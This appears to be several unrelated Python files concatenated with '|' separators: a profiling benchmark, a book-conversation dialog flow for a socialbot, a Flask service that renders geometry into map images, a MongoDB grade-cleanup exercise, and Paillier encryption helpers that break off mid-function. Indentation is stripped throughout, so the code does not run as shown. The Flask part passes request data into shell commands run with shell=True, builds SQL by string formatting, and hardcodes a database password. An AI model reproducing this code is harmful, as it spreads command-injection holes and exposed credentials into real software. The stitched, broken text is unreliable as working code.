# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/progshot/blob/master/NOTICE.txt
import io
from progshot import shoot, dump
class BenchmarkCase:
def __init__(self):
self.s = io.StringIO()
self.big_string = "abc"*1000
self.big_dict = {f"{i}": i for i in range(20)}
def do_baseline(self):
self.many_local_changes()
def do_experiment(self):
with shoot(depth=2):
self.many_local_changes()
def do_dump(self):
films = dump()
return films
def many_local_changes(self):
for _ in range(20):
a = 1
b = 2
c = 3
d = 4
e = 5
f = 6
bm = BenchmarkCase()
do_baseline = bm.do_baseline
do_experiment = bm.do_experiment
do_dump = bm.do_dump
|
"""
```append_question``` is used to change the current flow, like booklink2reply
```append_unused``` is used to add questions that lead to the concrete_book_flow,
i.e. questions that should be answered with a book name.
"""
import logging
import sentry_sdk
from os import getenv
import random
from common.constants import CAN_CONTINUE_SCENARIO, MUST_CONTINUE, CAN_NOT_CONTINUE
from df_engine.core.keywords import (
PROCESSING,
TRANSITIONS,
GLOBAL,
RESPONSE,
MISC,
)
from df_engine.core import Actor
import df_engine.conditions as cnd
import scenario.sf_conditions as dm_cnd
import common.dff.integration.condition as int_cnd
import common.dff.integration.processing as int_prs
from common.movies import SWITCH_MOVIE_SKILL_PHRASE
from common.science import OFFER_TALK_ABOUT_SCIENCE
import scenario.condition as loc_cnd
import scenario.processing as loc_prs
import scenario.response as loc_rsp
fav_keys = list(loc_rsp.FAVOURITE_BOOK_ATTRS.keys())
fav_keys = iter(fav_keys)
sentry_sdk.init(getenv("SENTRY_DSN"))
logger = logging.getLogger(__name__)
SUPER_CONFIDENCE = 1.0
HIGH_CONFIDENCE = 0.98
DEFAULT_CONFIDENCE = 0.95
BIT_LOWER_CONFIDENCE = 0.90
ZERO_CONFIDENCE = 0.0
flows = {
GLOBAL: {
TRANSITIONS: {
("global_flow", "fallback", 1.5): loc_cnd.exit_skill,
("books_general", "dislikes_reading", 1.5): loc_cnd.dislikes_reading,
("books_general", "book_start", 5): cnd.all(
[
loc_cnd.is_proposed_skill,
cnd.neg(loc_cnd.check_flag("book_skill_active")),
cnd.neg(loc_cnd.check_flag("book_start_visited")),
]
),
("books_general", "book_restart"): cnd.all(
[
loc_cnd.is_proposed_skill,
cnd.neg(loc_cnd.check_flag("book_skill_active")),
loc_cnd.check_flag("book_start_visited"),
]
),
("bot_fav_book", "fav_name", 4): cnd.any( # было 1.8
[
loc_cnd.is_last_used_phrase(loc_rsp.FAVOURITE_BOOK_PHRASES),
loc_cnd.asked_fav_book,
]
),
("bot_fav_book", "fav_denied", 2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.FAVOURITE_BOOK_PHRASES),
int_cnd.is_no_vars,
]
),
("bible_flow", "bible_start", 1.8): cnd.all(
[
loc_cnd.asked_about_bible,
cnd.neg(loc_cnd.check_flag("bible_start_visited")),
]
),
("bible_flow", "bible_elaborate", 1.8): cnd.all(
[loc_cnd.asked_about_bible, loc_cnd.check_flag("bible_start_visited")]
),
("genre_flow", "tell_phrase", 1): cnd.all(
[
cnd.any(
[
loc_cnd.told_fav_genre,
loc_cnd.asked_opinion_genre,
]
),
loc_cnd.check_genre_regexp,
]
),
("genre_flow", "return_genrebook", 1.2): loc_cnd.genrebook_request_detected,
("concrete_book_flow", "user_fav", 0.8): cnd.all([loc_cnd.told_fav_book, loc_cnd.book_in_request]),
("concrete_book_flow", "denied_information", 3): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase([loc_rsp.TELL_REQUEST, loc_rsp.TELL_REQUEST2]),
loc_cnd.asked_book_content,
]
),
int_cnd.is_no_vars,
]
),
("concrete_book_flow", "tell_about", 1.2): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase([loc_rsp.TELL_REQUEST, loc_rsp.TELL_REQUEST2]),
loc_cnd.asked_book_content,
]
),
cnd.any([loc_cnd.about_in_slots, loc_cnd.about_in_request]),
]
),
("concrete_book_flow", "offer_best", 1.6): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.bestbook_in_request,
]
),
("concrete_book_flow", "offer_date", 1.2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.date_in_request,
]
),
("concrete_book_flow", "tell_date", 0.8): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.WHEN_IT_WAS_PUBLISHED),
loc_cnd.asked_book_date,
]
),
cnd.any([loc_cnd.date_in_slots, loc_cnd.date_in_request]),
]
),
("concrete_book_flow", "offer_genre", 1.2): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.genre_in_request,
]
),
("concrete_book_flow", "offer_fact", 1.2): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.about_book,
]
),
cnd.any([loc_cnd.about_in_request, loc_cnd.movie_in_request]),
]
),
("concrete_book_flow", "ask_fav", 0.8): cnd.all(
[
loc_cnd.check_unused(loc_rsp.WHAT_BOOK_IMPRESSED_MOST),
loc_cnd.check_flag("user_fav_book_visited"),
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
]
),
("undetected_flow", "unrecognized_author", 0.8): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.check_author_regexp,
cnd.neg(loc_cnd.author_in_request),
]
),
("undetected_flow", "no_book_author", 0.8): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
cnd.neg(loc_cnd.bestbook_in_request),
loc_cnd.check_author_regexp,
]
),
("undetected_flow", "cannot_name", 0.7): cnd.all(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
cnd.any([int_cnd.is_no_vars, loc_cnd.doesnt_know]),
cnd.neg(loc_cnd.book_in_request),
cnd.neg(loc_cnd.author_in_request),
cnd.neg(loc_cnd.movie_in_request),
]
),
("undetected_flow", "ask_to_repeat", 0.7): cnd.all(
[
cnd.any(
[
loc_cnd.is_last_used_phrase(loc_rsp.ALL_QUESTIONS_ABOUT_BOOK),
loc_cnd.about_book,
]
),
cnd.any([int_cnd.is_yes_vars, loc_cnd.no_entities]),
cnd.neg(loc_cnd.book_in_request),
cnd.neg(loc_cnd.author_in_request),
cnd.neg(loc_cnd.movie_in_request),
]
),
}
},
"global_flow": {
"start": {
RESPONSE: "",
PROCESSING: {"set_can_continue": int_prs.set_can_continue(MUST_CONTINUE)},
TRANSITIONS: {("books_general", "book_start"): cnd.true()},
},
"fallback": {
RESPONSE: loc_rsp.append_unused(
initial="Anyway, let's talk about something else! ",
phrases=[
SWITCH_MOVIE_SKILL_PHRASE,
OFFER_TALK_ABOUT_SCIENCE,
"What's on your mind?",
],
),
PROCESSING: {
"set_flag": loc_prs.set_flag("book_skill_active"),
"set_confidence": int_prs.set_confidence(ZERO_CONFIDENCE),
"set_can_continue": int_prs.set_can_continue(CAN_NOT_CONTINUE),
},
TRANSITIONS: {},
},
},
"books_general": {
"book_start": {
RESPONSE: loc_rsp.append_unused("", [loc_rsp.START_PHRASE]),
PROCESSING: {
"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
"dislikes_reading": int_cnd.is_no_vars,
# "test1": dm_cnd.is_sf("React.Rejoinder.Support.Track.Clarify"),
"test_1": dm_cnd.is_sf("React.Rejoinder.Support.Track.Clarify"),
"likes_reading": cnd.true(),
},
MISC: {"speech_functions": ["Open.Demand.Fact"]},
},
"book_restart": {
RESPONSE: loc_rsp.append_unused(
initial="Speaking of books, ",
phrases=loc_rsp.QUESTIONS_ABOUT_BOOKS,
exit_on_exhaust=True,
),
PROCESSING: {
"set_confidence": int_prs.set_confidence(DEFAULT_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"set_can_continue": int_prs.set_can_continue(CAN_CONTINUE_SCENARIO),
},
TRANSITIONS: {("undetected_flow", "ask_to_repeat"): cnd.true()},
},
"dislikes_reading": {
RESPONSE: "Why don't you love reading? Maybe you haven't found the right book?",
TRANSITIONS: {"told_why": cnd.true()},
},
"likes_reading": {
RESPONSE: "I enjoy reading so much! Books help me understand humans much better. "
"Why do you enjoy reading?",
TRANSITIONS: {"told_why": cnd.true()},
},
"told_why": {
RESPONSE: loc_rsp.append_unused(
initial="That's great. Outside of a dog, a book is man's best friend. ",
phrases=[loc_rsp.WHAT_BOOK_LAST_READ],
),
TRANSITIONS: {("bot_fav_book", "fav_name"): cnd.true()},
},
"test_1": {
TRANSITIONS: {},
PROCESSING: {
"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE),
"set_flag": loc_prs.set_flag("book_skill_active", True),
"execute_response": loc_prs.execute_response,
},
RESPONSE: "I think that reading is cool and all people should read books",
MISC: {"speech_functions": ["React.Rejoinder.Support.Response.Resolve"]},
},
},
"bot_fav_book": {
"fav_name": {
RESPONSE: loc_rsp.append_unused(initial="{fav_book_init} ", phrases=[loc_rsp.TELL_REQUEST]),
PROCESSING: {
"save_next_key": loc_prs.save_next_key(fav_keys, loc_rsp.FAVOURITE_BOOK_ATTRS),
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
# "fav_denied": cnd.true(3),
"fav_denied": int_cnd.is_no_vars,
},
},
"fav_elaborate": {
RESPONSE: loc_rsp.append_unused(initial="{cur_book_about} ", phrases=[loc_rsp.TELL_REQUEST2]),
PROCESSING: {
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
("concrete_book_flow", "offer_date"): cnd.true(),
},
},
"fav_denied": {
RESPONSE: "OK, let me ask you something else then, alright?",
PROCESSING: {
"set_flag": loc_prs.set_flag("denied_favorite", True),
"set_confidence": int_prs.set_confidence(BIT_LOWER_CONFIDENCE),
},
TRANSITIONS: {
("books_general", "book_restart"): int_cnd.is_yes_vars,
},
},
},
"concrete_book_flow": {
"ask_fav": {
RESPONSE: loc_rsp.append_unused(initial="Fabulous! And ", phrases=[loc_rsp.WHAT_BOOK_IMPRESSED_MOST]),
PROCESSING: {
"set_flag": loc_prs.set_flag("user_fav_book_visited", True),
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
# ("undetected_flow", "ask_to_repeat"): cnd.any(
# [cnd.neg(loc_cnd.told_fav_book), cnd.neg(loc_cnd.book_in_request)]
# ),
"user_fav": cnd.true()
},
},
"user_fav": {
RESPONSE: "Great choice! Would you like us to discuss it?",
PROCESSING: {
"get_book": loc_prs.get_book,
"set_flag": loc_prs.set_flag("user_fav_book_visited", True),
},
TRANSITIONS: {"denied_information": cnd.true()},
},
"ask_opinion": {
RESPONSE: loc_rsp.append_unused(initial="", phrases=loc_rsp.OPINION_REQUEST_ON_BOOK_PHRASES),
TRANSITIONS: {
"user_liked": loc_cnd.sentiment_detected("positive"),
"user_disliked": loc_cnd.sentiment_detected("negative"),
},
},
"user_liked": {
RESPONSE: loc_rsp.append_question(
initial="I see you love it." "It is so wonderful that you read the books you love. "
),
PROCESSING: {"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE)},
TRANSITIONS: {
("bible_flow", "bible_start"): cnd.true(),
"denied_information": int_cnd.is_no_vars,
},
},
"user_disliked": {
RESPONSE: loc_rsp.append_question(initial="It's OK. Maybe some other books will fit you better. "),
PROCESSING: {"set_confidence": int_prs.set_confidence(SUPER_CONFIDENCE)},
TRANSITIONS: {},
},
"offer_best": {
RESPONSE: loc_rsp.append_unused(
initial="You have a great taste in books! "
"I also adore books by {cur_book_author}, "
"especially {cur_author_best}. ",
phrases=loc_rsp.ASK_ABOUT_OFFERED_BOOK,
),
PROCESSING: {
"get_book": loc_prs.get_book,
"get_author": loc_prs.get_author,
"get_book_by_author": loc_prs.get_book_by_author,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: loc_cnd.has_read_transitions,
},
"offer_genre": {
RESPONSE: loc_rsp.ASK_GENRE_OF_BOOK,
PROCESSING: {
"get_book": loc_prs.get_book,
"get_book_genre": loc_prs.get_book_genre,
},
TRANSITIONS: {"tell_genre": cnd.true()},
},
"tell_genre": {
RESPONSE: loc_rsp.append_question(initial="I believe that {cur_book_name} is {cur_genre}. "),
PROCESSING: {
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
# NEW
TRANSITIONS: {
("bible_flow", "bible_start"): cnd.true(),
"denied_information": int_cnd.is_no_vars,
},
},
# new node
# "appreciation": {
# RESPONSE: "You have good taste in books!",
# TRANSITIONS: {
# ()
# },
# },
"offer_fact": {
RESPONSE: ("It's an amazing book! " + loc_rsp.OFFER_FACT_ABOUT_BOOK),
PROCESSING: {
"get_book": loc_prs.get_book,
"about_bookreads": loc_prs.about_bookreads,
"about_wiki": loc_prs.about_wiki,
"get_movie": loc_prs.get_movie,
},
TRANSITIONS: {
("undetected_flow", "change_branch"): cnd.true(),
},
},
"tell_about": { # НЕ РАБОТАЕТ
RESPONSE: loc_rsp.append_unused(initial="{cur_book_about} ", phrases=[loc_rsp.WHEN_IT_WAS_PUBLISHED]),
PROCESSING: {
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
"tell_date": cnd.all([int_cnd.is_yes_vars, loc_cnd.check_slot("cur_book_ago")]),
"denied_information": int_cnd.is_no_vars,
("global_flow", "fallback"): cnd.true(),
},
},
"tell_movie": {
RESPONSE: "I enjoyed watching the film {cur_book_movie} based on this book, "
"directed by {cur_book_director}. ",
PROCESSING: {
"get_movie": loc_prs.get_movie,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
"offer_date": {
RESPONSE: loc_rsp.append_unused(
initial="I've read it. It's an amazing book! ",
phrases=[loc_rsp.WHEN_IT_WAS_PUBLISHED],
),
PROCESSING: {
"get_book": loc_prs.get_book,
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
},
TRANSITIONS: {
"tell_date": cnd.all([int_cnd.is_yes_vars, loc_cnd.check_slot("cur_book_ago")]),
"denied_information": int_cnd.is_no_vars,
("global_flow", "fallback"): cnd.true(),
},
},
"tell_date": {
RESPONSE: loc_rsp.append_unused(initial="{cur_book_ago}ago! ", phrases=loc_rsp.DID_NOT_EXIST),
PROCESSING: {
"get_book_year": loc_prs.get_book_year,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {
"offer_genre": loc_cnd.check_slot("cur_book_plain"),
("undetected_flow", "change_branch"): cnd.true(),
},
},
"denied_information": {
RESPONSE: loc_rsp.append_question(initial="As you wish. "),
TRANSITIONS: {("bible_flow", "bible_start"): int_cnd.is_no_vars},
},
},
"genre_flow": {
"tell_phrase": {
RESPONSE: loc_rsp.genre_phrase,
PROCESSING: {
"set_flag": loc_prs.set_flag("user_fav_genre_visited", True),
"get_genre_regexp": loc_prs.get_genre_regexp,
"set_can_continue": int_prs.set_can_continue(MUST_CONTINUE),
},
TRANSITIONS: {
("concrete_book_flow", "denied_information"): int_cnd.is_no_vars,
},
},
"return_genrebook": {
RESPONSE: ("Amazing! I hear, {cur_book_name} is quite good. " + loc_rsp.HAVE_YOU_READ_BOOK),
PROCESSING: {
"get_genre_regexp": loc_prs.get_genre_regexp, # extracts new genre or leaves previous
"get_book_by_genre": loc_prs.get_book_by_genre, # extracts the book
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: loc_cnd.has_read_transitions,
},
"not_read_genrebook": {
RESPONSE: loc_rsp.append_unused(
initial=random.choice(loc_rsp.READ_BOOK_ADVICES) + " ",
phrases=[loc_rsp.TELL_REQUEST],
),
PROCESSING: {"execute_response": loc_prs.execute_response},
TRANSITIONS: {
("books_general", "book_restart"): int_cnd.is_no_vars,
},
},
"genrebook_info": {
RESPONSE: loc_rsp.append_question(initial="{cur_book_about} Anyway, "),
PROCESSING: {
"about_bookreads": loc_prs.about_bookreads,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
"bot_fav": {
RESPONSE: loc_rsp.genre_phrase,
PROCESSING: {
"save_slots_to_ctx": int_prs.save_slots_to_ctx(
{"cur_genre", random.choice(list(loc_rsp.GENRE_PHRASES.keys()))}
)
},
TRANSITIONS: {},
},
},
"bible_flow": {
"bible_start": {
RESPONSE: (
"You have good taste in books! "
"By the way, I know that Bible is one of the most widespread books on Earth. "
"It is the foundation stone of Christianity. Have you read the whole Bible?"
),
TRANSITIONS: {
"bible_elaborate": cnd.true(),
},
},
"bible_elaborate": {
RESPONSE: loc_rsp.append_unused(
initial="Unfortunately, as a socialbot, I don't have an immortal soul, "
"so I don't think I will ever go to Heaven. "
"That's why I don't know much about religion. "
"Apart from the Bible, ",
phrases=loc_rsp.QUESTIONS_ABOUT_BOOKS,
),
TRANSITIONS: {
("undetected_flow", "ask_to_repeat"): cnd.true(),
},
},
},
"undetected_flow": {
"ask_to_repeat": {
RESPONSE: (
"I'm sorry, but I don't know what to say to that yet, "
"but I will definitely learn! Have a nice day, bye!"
),
TRANSITIONS: {},
},
"change_branch": {
RESPONSE: loc_rsp.append_question(initial=""),
TRANSITIONS: {},
},
"cannot_name": {RESPONSE: loc_rsp.BOOK_ANY_PHRASE, TRANSITIONS: {}},
"ask_question": {
RESPONSE: loc_rsp.append_question(initial="Never heard about it. I will check it out later. "),
TRANSITIONS: {},
},
"unrecognized_author": {
RESPONSE: loc_rsp.append_question(
initial="Strange, I've never heard about this author. I'll surely check out his works sometime. "
),
TRANSITIONS: {},
},
"no_book_author": {
RESPONSE: loc_rsp.append_question(initial="{cur_book_author} is a wonderful writer! By the way, "),
PROCESSING: {
"get_author_regexp": loc_prs.get_author_regexp,
"execute_response": loc_prs.execute_response,
"fill_responses_by_slots": int_prs.fill_responses_by_slots(),
},
TRANSITIONS: {},
},
},
}
actor = Actor(
flows,
start_label=("global_flow", "start"),
fallback_label=("global_flow", "fallback"),
)
logger.info("Actor created successfully")
|
from flask import abort, request, render_template, jsonify, send_file
import psycopg2
import sys
import os
import time
import glob
import json
import re
import subprocess
import tempfile
import math
from utils.jsonp import jsonp
from shapely.geometry import shape
from shapely.ops import cascaded_union
from geojson import Feature, FeatureCollection, dumps
from shapely.wkb import loads
def fart_serve(fart_id):
if request.method == 'GET':
try:
tf = open("/tmp/fart_"+fart_id+".png", "r")
return send_file(tf, mimetype='image/png')
except Exception as e:
abort(404)
abort(404)
def fart_recent():
if request.method == 'GET':
try:
search_dir = "/tmp/"
files = filter(os.path.isfile, glob.glob(search_dir + "fart_*.png"))
files.sort(key=lambda x: os.path.getmtime(x))
files = [[os.path.splitext(os.path.basename(tf))[0],time.ctime(os.path.getmtime(tf))] for tf in files]
return render_template("recent.html", files = files[-20:])
#return jsonify({'files':' '.join(f for f in files)})
except Exception as e:
abort(404)
abort(404)
# Yummy default farts
def fart_default():
if request.method == 'POST':
return fart()
# Override the srid
def fart_srid(srid):
if request.method == 'POST':
return fart(srid=srid)
# Override the srid and size
def fart_srid_xy(srid,xsize,ysize):
if request.method == 'POST':
return fart(srid=srid, xsize=xsize, ysize=ysize)
@jsonp
def fart(srid=4326, xsize=800, ysize=800):
# Only POST is accepted
if request.method == 'POST':
data = request.data
# Test code
# return jsonify({'data': data, 'ct': request.environ['HTTP_CONTENT_TYPE']})
# We received a GeoJSON payload
if data.startswith('{'):
try:
js = json.loads(data)
return process_geojson(js, srid, xsize, ysize)
except Exception as e:
abort(404)
# WKT Payload
elif re.match(r'^[PLMG\"]',data):
# Strip off "'s if they are there
if data.endswith("\""):
data = data[:-1]
if data.startswith("\""):
data = data[1:]
return process_wkt(data,xsize,ysize)
# WKB Payload
elif re.match(r'^[0-9A-F]+$',data.strip()):
return process_wkb(data,xsize,ysize)
else:
# We don't know what this data is....
# return jsonify({'unknown data': data})
abort(500)
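# Payload shapes the dispatcher above distinguishes (illustrative values only):
#   GeoJSON:  {"type": "FeatureCollection", "features": [...]}      -> process_geojson
#   WKT:      POINT(-122.4 37.8)                                    -> process_wkt
#   WKB hex:  0101000000000000000000F03F000000000000F03F            -> process_wkb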
def process_wkb(data,xsize,ysize):
try:
wkbdata = loads(data.strip().decode("hex"))
tf = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
cmd = "/usr/local/lib/geom-0.2/bin/geom draw -w %s -h %s -f %s -g '%s'" % (xsize, ysize, tf.name, wkbdata.wkt)
# return jsonify({'cmd':cmd})
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
# log.error('stderr_value: %s' % stderr_value)
abort(500)
except Exception as e:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf.name))[0] + "\n"
def process_wkt(data,xsize,ysize):
try:
tf = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
cmd = "/usr/local/lib/geom-0.2/bin/geom draw -w %s -h %s -f %s -g '%s'" % (xsize, ysize, tf.name, data)
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
# log.error('stderr_value: %s' % stderr_value)
abort(500)
except Exception as e:
# return jsonify({'stdout':stdout_value, 'stderr':sderr_value})
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf.name))[0] + "\n"
def process_geojson(js, srid, xsize, ysize):
shapes = []
points = []
lines = []
polygons = []
count = 0
for f in js['features']:
count = count + 1
myShape = shape(f['geometry'])
shapes.append(myShape)
if re.match(r'Point', myShape.geom_type) or re.match(r'MultiPoint', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo1"})
points.append(myFeature)
elif re.match(r'Line', myShape.geom_type) or re.match(r'MultiLine', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo2"})
lines.append(myFeature)
elif re.match(r'Polygon', myShape.geom_type) or re.match(r'MultiPolygon', myShape.geom_type):
myFeature = Feature(id=count,
geometry=myShape,
properties = {"name": "foo3"})
polygons.append(myFeature)
bbox = cascaded_union(shapes).bounds
if srid != 4326:
if srid==3857 or srid==900913:
ymin = bbox[1]
ymax = bbox[3]
# for spherical mercator clamp to 85 deg north and south
if ymin < -85.0:
ymin = -85.0
if ymax > 85.0:
ymax = 85.0
bbox = (bbox[0],ymin,bbox[2],ymax)
# we must translate the bbox to the output projection
connstring="dbname='projfinder' port=5432 user='mapfart' host='localhost' password='mapfart'"
try:
conn=psycopg2.connect(connstring)
cursor=conn.cursor()
sql = "select st_x(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as xmin, st_y(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as ymin, st_x(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as xmax, st_y(st_transform(st_geometryfromtext('POINT(%s %s)',4326),%s)) as ymax" % (bbox[0],bbox[1],str(srid),bbox[0],bbox[1],str(srid),bbox[2],bbox[3],str(srid),bbox[2],bbox[3],str(srid))
cursor.execute(sql)
results = cursor.fetchone()
bbox_string = " ".join(str(b) for b in results)
except Exception as e:
abort(500)
else:
bbox_string = " ".join(str(b) for b in bbox)
# Monkey with the image size to get the aspect ratio about the same as the extent of the data
data_aspect = ((bbox[2] - bbox[0])/2) / (bbox[3] - bbox[1])
if data_aspect>=1:
ysize = math.trunc(float(xsize) / data_aspect)
else:
xsize = math.trunc(float(ysize) * data_aspect)
# Testing debug
#return jsonify({'xsize':xsize, 'ysize':ysize, 'srid':srid})
tf_points = tempfile.NamedTemporaryFile(prefix='fart_pt_', suffix='.json', delete=False)
tf_lines = tempfile.NamedTemporaryFile(prefix='fart_ln_', suffix='.json', delete=False)
tf_polygons = tempfile.NamedTemporaryFile(prefix='fart_poly_', suffix='.json', delete=False)
layers_to_draw = ""
if len(points) > 0:
tf_points.write(dumps(FeatureCollection(points)))
layers_to_draw = layers_to_draw + "points "
if len(lines) > 0:
tf_lines.write(dumps(FeatureCollection(lines)))
layers_to_draw = layers_to_draw + "lines "
if len(polygons) > 0:
tf_polygons.write(dumps(FeatureCollection(polygons)))
layers_to_draw = layers_to_draw + "polygons "
tf_points.flush()
tf_points.close()
tf_lines.flush()
tf_lines.close()
tf_polygons.flush()
tf_polygons.close()
# Now that we have our bounds and up to 3 files (points, lines, polygons) we
# can have mapserver kick out an image.
mapfile = render_template("mapfart.map", point_name = tf_points.name,
line_name = tf_lines.name,
polygon_name = tf_polygons.name,
srid = str(srid))
tf_mapfile = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.map', delete=False)
tf_mapfile.write(mapfile)
tf_mapfile.flush()
tf_mapfile.close()
tf_png = tempfile.NamedTemporaryFile(prefix='fart_', suffix='.png',delete=False)
try:
cmd = "/usr/local/bin/shp2img -m %s -o %s -l '%s' -s %s %s -e %s" % (tf_mapfile.name, tf_png.name, layers_to_draw.strip(), str(xsize), str(ysize), bbox_string)
#return jsonify({'cmd':cmd})
proc = subprocess.Popen(
cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# wait for processing to finish
stdout_value, stderr_value = proc.communicate()
if stderr_value:
pass
# return jsonify({'stdout':stdout_value, 'stderr':stderr_value})
# log.error('stderr_value: %s' % stderr_value)
except Exception as e:
abort(500)
return "http://mapfart.com/" + os.path.splitext(os.path.basename(tf_png.name))[0] + "\n"
def testcurl():
if request.method == 'POST':
# data = request.form.keys()[0]
data = request.data
foo = ''
if len(request.args) > 0 and request.args.get('foo'):
foo = request.args['foo']
return jsonify({'data':data, 'foo':foo})
else:
abort(404)
|
# Write a program in the language of your choice
# that will remove the grade of type "homework"
# with the lowest score for each student from the dataset in the handout.
# Since each document is one grade, it should remove one document per student.
# This will use the same data set as the last problem, but if you don't have it,
# you can download and re-import
import pymongo
from pymongo import MongoClient
connection = MongoClient('localhost', 27017)
def find_all_hw_assignments():
db = connection.students
grades = db.grades
try:
for i in range(0,200,1):
homework = grades.find({'type': 'homework', 'student_id': i})
if homework:
array = []
for hw in homework:
array.append(hw)
if array[0]['score'] < array[1]['score']:
grades.delete_one({'_id': array[0]['_id']})
else:
grades.delete_one({'_id': array[1]['_id']})
except Exception as e:
print("Error", e)
find_all_hw_assignments()
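# Note: inside the loop above, a sketch of the same deletion using a server-side sort
# instead of comparing the two documents in Python (same 'students.grades' collection assumed):
#   lowest = grades.find({'type': 'homework', 'student_id': i}).sort('score', 1).limit(1)
#   for doc in lowest:
#       grades.delete_one({'_id': doc['_id']})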
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from arch.api.utils import log_utils
from federatedml.secureprotol.encrypt import PaillierEncrypt
from federatedml.secureprotol.fate_paillier import PaillierPublicKey, PaillierPrivateKey
LOGGER = log_utils.getLogger()
def generate_encryption_key_pair():
paillierEncrypt = PaillierEncrypt()
paillierEncrypt.generate_key()
public_key = paillierEncrypt.get_public_key()
private_key = paillierEncrypt.get_privacy_key()
return public_key, private_key
def encrypt_array(public_key: PaillierPublicKey, A):
encrypt_A = []
for i in range(len(A)):
encrypt_A.append(public_key.encrypt(float(A[i])))
return np.array(encrypt_A)
def encrypt_matrix(public_key: PaillierPublicKey, A):
# remember the original rank so a 1-D input can be squeezed back after encryption
was_1d = len(A.shape) == 1
if was_1d:
A = np.expand_dims(A, axis=0)
encrypt_A = []
for i in range(len(A)):
row = []
for j in range(len(A[i])):
if len(A.shape) == 3:
row.append([public_key.encrypt(float(A[i, j, k])) for k in range(len(A[i][j]))])
else:
row.append(public_key.encrypt(float(A[i, j])))
encrypt_A.append(row)
result = np.array(encrypt_A)
if was_1d:
result = np.squeeze(result, axis=0)
return result
def encrypt_matmul(public_key: PaillierPublicKey, A, encrypted_B):
"""
matrix multiplication between a plain matrix and an encrypted matrix
:param public_key:
:param A:
:param encrypted_B:
:return:
"""
if A.shape[-1] != encrypted_B.shape[0]:
LOGGER.debug("A and encrypted_B shape are not consistent")
exit(1)
# TODO: need an efficient way to do this?
res = [[public_key.encrypt(0) for _ in range(encrypted_B.shape[1])] for _ in range(len(A))]
for i in range(len(A)):
for j in range(encrypted_B.shape[1]):
for m in range(len(A[i])):
res[i][j] += A[i][m] * encrypted_B[m][j]
return np.array(res)
def encrypt_matmul_3(public_key: PaillierPublicKey, A, encrypted_B):
